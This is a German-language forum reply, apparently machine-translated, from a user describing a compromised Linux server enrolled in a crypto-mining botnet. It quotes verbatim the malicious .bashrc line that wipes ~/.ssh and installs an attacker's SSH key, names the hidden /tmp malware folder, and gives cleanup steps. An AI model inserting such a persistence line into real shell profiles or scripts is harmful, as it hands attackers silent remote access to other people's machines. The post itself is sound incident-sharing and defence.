Das gleiche ist mir passiert und ich habe es gestern bemerkt. Ich habe die Datei überprüft /var/log/syslog
und diese IP (185.234.218.40) schien automatisch Cronjobs auszuführen.
Ich habe es auf http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) überprüft und es gibt einige Berichte. Diese Dateien wurden vom Trojaner bearbeitet:
- .bashrc
- .ssh / authorized_keys
Ich fand dies am Ende von .bashrc
(was jedes Mal ausgeführt wird, wenn die Bash geöffnet wird):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Es wird Ihre authorized_keys
Datei gelöscht. Hierbei handelt es sich um eine Liste von SSH-Schlüsseln, die eine Verbindung ohne Kennwort herstellen dürfen. Dann wird der SSH-Schlüssel des Angreifers hinzugefügt:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Außerdem habe ich diesen Ordner gefunden:, /tmp/.X13-unix/.rsync
in dem sich die gesamte Malware befindet. Ich habe sogar eine Datei gefunden, /tmp/.X13-unix/.rsync/c/ip
eine Datei mit 70 000 IP-Adressen, bei denen es sich höchstwahrscheinlich um andere Opfer oder Knotenserver handelt.
Es gibt 2 Lösungen: A:
Fügen Sie eine Firewall hinzu, die alle ausgehenden Verbindungen mit Ausnahme von Port 22 und anderen, die Sie für erforderlich halten, blockiert, und aktivieren Sie fail2ban, ein Programm, das eine IP-Adresse nach fehlgeschlagenen X-Kennwortversuchen sperrt
Beenden Sie alle Cron-Jobs:
ps aux | grep cron
und töten Sie dann die angezeigte PID
Ändern Sie Ihr Passwort in ein sicheres
B:
Sichern Sie alle Dateien oder Ordner, die Sie benötigen oder möchten
Setzen Sie den Server zurück und installieren Sie Ubuntu neu, oder erstellen Sie direkt ein neues Droplet
Wie Thom Wiggers sagte, sind Sie sicherlich Teil eines Bitcoin-Mining-Botnets und Ihr Server hat eine Hintertür . Die Hintertür verwendet einen Perl-Exploit, eine Datei, die sich hier befindet: /tmp/.X13-unix/.rsync/b/run
( https://pastebin.com/ceP2jsUy )
Die verdächtigsten Ordner, die ich gefunden habe, waren:
Schließlich gibt es hier einen Artikel zu Perl Backdoor:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Ich hoffe, Sie finden das nützlich.
.firefoxcatche
hat wohl nichts mit firefox zu tun - könnte das nur ein bitcoin miner sein? Versuchen Sie, die ausführbaren Dateien auf virustotal hochzuladen.